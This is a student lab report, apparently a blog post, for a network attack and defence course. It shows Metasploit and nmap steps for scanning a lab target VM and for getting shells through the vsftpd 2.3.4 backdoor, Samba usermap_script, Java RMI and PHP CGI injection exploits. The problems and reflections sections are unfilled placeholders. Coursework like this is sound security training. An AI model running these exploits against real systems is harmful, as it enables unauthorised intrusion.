20232320 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

信息收集

使用Metasploit发现靶机IP。
对靶机进行端口扫描。

漏洞利用,利用漏洞获取Shell

Vsftpd后门漏洞(端口21)
Samba命令注入漏洞(端口139)
Java RMI漏洞(端口1099)
PHP CGI注入漏洞(端口80)

2.实验过程

(1)前期渗透

kali攻击机:192.168.190.129
靶机:192.168.190.142

①主机发现(可用Aux中的arp_sweep,search一下就可以use)

在kali中使用msfconsole
输入search arp_sweep搜索ARP扫描辅助模块
使用use 0
扫描靶机所在网段set RHOSTS 192.168.190.0/24
run开始
2927170e210428fb0e24d89e297e143
可以看到我们的靶机142,是VMware, Inc.是vmware虚拟机

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
使用nmap进行端口扫描

kali中输入nmap -sS -sV 192.168.190.142
64f4d14f8eb383566e97b4f6731ee63
可以看到扫描metaploit开放的多个端口以及对应的服务

使用Metasploit的portscan/tcp模块

还是先打开msfconsole
use auxiliary/scanner/portscan/tcp启动Metasploit框架内置的一个TCP端口扫描器,用来发现目标机器开放了哪些端口
set RHOSTS 192.168.190.142
set THREADS 10多线程,提高效率
run
2ef1c1f2eaf028a049da850249f33ed
可以看到开放的多个端口

③选做:也可以扫系统版本、漏洞等。

kali中输入nmap -script=vuln 192.168.190.142
08e61b65c593df111e63eba1d1a20fe
7467c191a2995e6a9b8e82af0816b43
23c970c9ea28f75101c5b27514889ff
0636aececd093e5ca1f3c8d6ca36be1
799cc25893407632e19fb1eacbc6159
ab254445581ab9d92c581a09509ce87

(2)Vsftpd源码包后门漏洞(21端口)

看看21端口是否开放nmap -sV -p 21 192.168.190.142
33ef37c520021257b390ce254f126d0

5dfc8f4277c9c65e58f8781194258a2
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

利用步骤:

在kali中执行msfconsole 启动metasploit

use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞

set RHOST XX.xx.xx.xx 设置要攻击的机器IP(靶机IP)

exploit/run 开始攻击

利用成功
执行uname –a、 pwd、 id等命令 验证

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
5bd98579e0d91c72ab1efb1a48c5ae9
利用步骤:
7dfbcde6db86619545a7fc47f8327be
use exploit/multi/samba/usermap_script 选择漏洞

set RHOST ip 设置要攻击的机器IP

exploit 开始攻击

利用成功 执行uname–a验证

(4)Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

操作步骤:

首先查看1099端口是否打开。

然后在MSF中:
use exploit/multi/misc/java_rmi_server

show options 查看配置参数

set RHOST (靶机IP)

exploit/run

sessions -i id

shell (进入meterpreter时,使用whoami验证下)

(5)PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

在kali中执行msfconsole,启动metasploit

msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞

set RHOST ip 设置要攻击的机器IP

exploit/run 开始攻击

3.问题及解决方案

  • 问题1:XXXXXX
  • 问题1解决方案:XXXXXX
  • 问题2:XXXXXX
  • 问题2解决方案:XXXXXX - ...

4.学习感悟、思考等

xxx xxx

参考资料

posted @ 2025-11-23 21:31  20232320黄馨仪  阅读(5)  评论(0)    收藏  举报